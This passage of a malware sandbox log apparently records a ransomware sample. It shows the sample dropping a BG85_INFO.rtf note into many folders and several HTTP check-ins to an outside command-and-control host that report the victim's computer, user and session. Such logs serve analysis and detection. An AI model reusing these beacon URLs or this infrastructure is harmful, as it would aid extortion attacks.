Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\include\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe HTTP URL 6 http://sec.timerz.org/addrecord.php?apikey=bg85_api_key&compuser=UCQFZDUI|Admin&sid=qZ7vFvv6UiRj9w0t&phase=1F625CDBAAB7078C|3335|1GB Process not Found File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Recovery\051be182-cc51-11ea-ac13-46f8a7600ebe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\startupCache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\db\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Music\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\ext\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Z1YRRYOY\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Favorites\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Documents\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe HTTP URL 2 http://sec.timerz.org/addrecord.php?apikey=bg85_api_key&compuser=UCQFZDUI|Admin&sid=qZ7vFvv6UiRj9w0t&phase=START Process not Found File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Videos\Sample Videos\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\All Users\Microsoft\MF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Pictures\Sample Pictures\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DUF815Z1\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\cmm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\skins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\cache2\entries\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\uninstall\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Favorites\Windows Live\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00008D31\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Contacts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Music\Sample Music\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe HTTP URL 5 http://sec.timerz.org/addrecord.php?apikey=bg85_api_key&compuser=UCQFZDUI|Admin&sid=qZ7vFvv6UiRj9w0t&phase=[ALL]1F625CDBAAB7078C Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\security\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\permanent\chrome\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Documents\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created 